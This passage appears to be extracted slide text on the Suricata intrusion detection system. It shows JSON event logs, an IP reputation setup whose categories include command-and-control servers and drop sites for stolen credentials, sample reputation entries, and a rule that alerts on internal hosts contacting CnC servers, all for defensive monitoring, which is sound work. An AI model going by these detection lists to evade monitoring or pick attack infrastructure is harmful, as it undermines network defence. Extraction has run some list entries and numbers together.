pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d
est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-
linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt
u.com","http_user_agent":"Debian APT-
HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt
u/pool/main/u/util-linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","magic":"Debian binary
package
(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff
02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id
":2}}
{"timestamp":"2014-11-
18T12:40:42.744230","flow_id":2901423184,"event_ty
pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d
est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-
linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt
u.com","http_user_agent":"Debian APT-
HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt
u/pool/main/u/util-linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","magic":"Debian binary
package
(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff
02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id
":2}}
{"timestamp":"2014-11-
18T12:40:42.744230","flow_id":2901423184,"event_ty
pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d
est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-
linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt
u.com","http_user_agent":"Debian APT-
HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt
u/pool/main/u/util-linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","magic":"Debian binary
package
(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff
02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id
":2}}
{"timestamp":"2014-11-
21T08:11:45.222089","flow_id":2896612328,"event_ty
pe":"tls","src_ip":"23.206.115.50","src_port":443,"dest_
ip":"10.8.0.6","dest_port":47063,"proto":"TCP",
"tls":{"subject":"serialNumber=5189573, unknown=US,
unknown=Delaware, unknown=Private Organization,
C=US, unknown=94107, ST=California, L=San
Francisco, unknown=855 FOLSOM ST APT 535,
O=Remember The Milk Inc., OU=Comodo EV SAN
SSL,CN=www.rememberthemilk.com","issuerdn":"C=
GB, ST=Greater Manchester, L=Salford, O=COMODO
CA Limited, CN=COMODO Extended Validation
Secure Server CA 2",
"fingerprint":"0b:1e:68:8c:ec:9f:7a:9c:70:4f:58:41:fb:c6:
53:ba:ba:e1:6c:af","version":"TLS 1.2"}}
{"timestamp":"2014-11-
21T08:32:22.001162","flow_id":2904615464,"event_type":"netflow","src_ip":"23.206.107.75","src_port":443,"dest_ip":"10.8.0.6","dest_port":52556,
"proto":"TCP",
"netflow":{"app_proto":"tls","pkts":73,"bytes":66135,"start":"2014-11-21T08:28:08.789426","end":"2014-11-
21T08:30:19.242083","age":131},"tcp":{"tcp_flags":"1b","syn":true,"fin":true,"psh":true,"ack":true}}
7
1
# IP Reputation#reputation-categories-file:
/etc/suricata/iprep/categories.txt#default-reputation-path: /etc/suricata/iprep#reputation-files:# - reputation.list
7
2
1,CnC,Malware Command and Control Server2,Bot,Known Infected Bot3,Spam,Known Spam Source4,Drop,Drop site for logs or stolen credentials5,SpywareCnC,Spyware Reporting Server6,OnlineGaming,Questionable Gaming Site7,DriveBySrc,Driveby Source9,ChatServer,POLICY Chat Server10,TorNode,POLICY Tor Node13,Compromised,Known compromised or Hostile15,P2P,P2P Node16,Proxy,Proxy Host17,IPCheck,IP Check Services19,Utility,Known Good Public Utility20,DDoSTarget,Target of a DDoS21,Scanner,Host Performing Scanning23,Brute_Forcer,SSH or other brute forcer24,FakeAV,Fake AV and AS Products25,DynDNS,Domain or IP Related to a Dynamic DNS
Entry or Request26,Undesirable,Undesirable but not illegal27,AbusedTLD,Abused or free TLD Related
28,SelfSignedSSL,Self Signed SSL or other suspicious encryption
29,Blackhole,Blackhole or Sinkhole systems30,RemoteAccessService,GoToMyPC and similar
remote access services31,P2PCnC,Distributed CnC Nodes33,Parking,Domain or SEO Parked34,VPN,VPN Server35,EXE_Source,Observed serving executables37,Mobile_CnC,Known CnC for Mobile specific
Family38,Mobile_Spyware_CnC,Spyware CnC specific
to mobile devices39,Skype_SuperNode,Observed Skype Bootstrap
or Supernode40,Bitcoin_Related,Bitcoin Mining and related41,DDoSAttacker,DDoS Source
7
3
104.28.1.81,34,117109.98.29.2,21,42110.4.91.87,35,107114.49.15.0,2,67114.79.12.5,2,87114.99.50.2,21,107115.68.2.49,24,63119.6.108.7,23,42119.81.70.6,23,12212.23.239.4,21,82120.83.6.14,23,32121.7.94.49,15,82123.0.48.59,15,57125.69.87.5,21,72135.23.77.3,21,5014.3.38.120,23,70142.0.38.68,2,37
7
4
alert ip $HOME_NET any -> any any (msg:"IPREP internal host talking to CnC server"; flow:to_server; iprep:dst,CnC,>,30; sid:1; rev:1;)
7
5
https://home.regit.org
Intel(R) Xeon(R) CPU E5-2680 0 @ 2.70GHz (16 cores counting Hyperthreading)
32Gig Ram
Intel 82599EB 10-Gigabit SFI/SFP+ (approx $700)
~ $4,972
Contact Information
• Matt Jonkman, [email protected]
• Emerging Threats [email protected]
http://www.emergingthreats.net
http://www.suricata-ids.org
http://openinfosecfoundation.org